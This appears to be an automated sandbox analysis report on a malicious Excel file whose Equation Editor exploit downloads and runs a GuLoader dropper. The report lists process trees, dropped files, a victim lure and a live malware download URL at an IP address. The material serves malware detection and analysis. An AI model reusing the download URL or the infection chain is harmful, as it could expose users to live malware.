Source: EQNEDT32.EXE, 00000002.00000002.413445105.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477317406.000000000063F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.72.68.128/S1510M/smss.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.477890729.00000000035F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.72.68.128/S1510M/smss.exej
Source: audiodgse.exe, audiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: audiodgse.exe, 00000005.00000000.413248475.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe, 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmp, audiodgse.exe, 0000000A.00000000.476233399.0000000000409000.00000008.00000001.01000000.00000005.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: http://s.symcd.com06
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: EQNEDT32.EXE, 00000002.00000003.411629495.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, audiodgse.exe.2.dr, smss[1].exe.2.dr	String found in binary or memory: https://d.symcb.com/rpa0.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3A46B79.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035303C0

Source: global traffic

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Code function: 5_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

5_2_0040523F

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: document is protected 15 mcnwy m & Soc 16 17 G0~ D0cuk Nm 18 4jozlu633 m & Soc. 19 20
Source: Screenshot number: 8	Screenshot OCR: document is protected 15 mcnwy Ma &50c. 16 17 18 4jDm46jj mm Na&S0c- 19 20 GEG
Source: Screenshot number: 12	Screenshot OCR: Enable Editing" from the yellow bar above Once you have enabled editing, please click "Enable Co
Source: Screenshot number: 12	Screenshot OCR: document is protected Document Language: English (US.) Change Convert P " Open the document in
Source: Screenshot number: 12	Screenshot OCR: protected documents If this document was downloaded from your email, please click 3 "Enable Edit
Source: Screenshot number: 12	Screenshot OCR: Enable Content" from the yellow bar above D Create PDF v &j Edit PDF E3 Comment <J Combine File

Excel sheet contains many unusual embedded objects

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	OLE: Microsoft Excel 2007+
Source: ~DF8C8D6BC10DEDB38C.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DF8DCB70E4BFE1EB2B.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 4B430000.0.dr	OLE: Microsoft Excel 2007+

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\audiodgse.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Code function: 5_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

5_2_00403235

Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_00406666		5_2_00406666
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Code function: 5_2_72BE1A98		5_2_72BE1A98

Source: ~DF8C8D6BC10DEDB38C.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF8DCB70E4BFE1EB2B.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	OLE indicator, VBA macros: true
Source: 4B430000.0.dr	OLE indicator, VBA macros: true

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	ReversingLabs: Detection: 34%
Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	Virustotal: Detection: 48%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\audiodgse.exe "C:\Users\user\AppData\Roaming\audiodgse.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: .LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\#U4e5d#U6708#U58f0#U660e_40981677.xls

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

5_2_00403235

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8564.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@22/46@0/3

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Code function: 5_2_00402138 CoCreateInstance,MultiByteToWideChar,

5_2_00402138

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Code function: 5_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

5_2_004044FA

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls	OLE indicator, Workbook stream: true
Source: 4B430000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

File written: C:\Users\user\AppData\Local\Temp\reinhold.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: #U4e5d#U6708#U58f0#U660e_40981677.xls

Static file information: File size 1282048 > 1048576

Source: ~DF8C8D6BC10DEDB38C.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000005.00000002.1051412581.00000000087F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Code function: 5_2_72BE2F60 push eax; ret

5_2_72BE2F8E

Source: C:\Users\user\AppData\Roaming\audiodgse.exe

Code function: 5_2_72BE1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

5_2_72BE1A98

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\audiodgse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035303C0

Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Spongiform.For	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Megapterine.buc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Engroshandlerne.agr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\haves.ant	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\laggin.tel	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\regneoperatorers.txt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers\unintriguing.tie	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audiodgse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
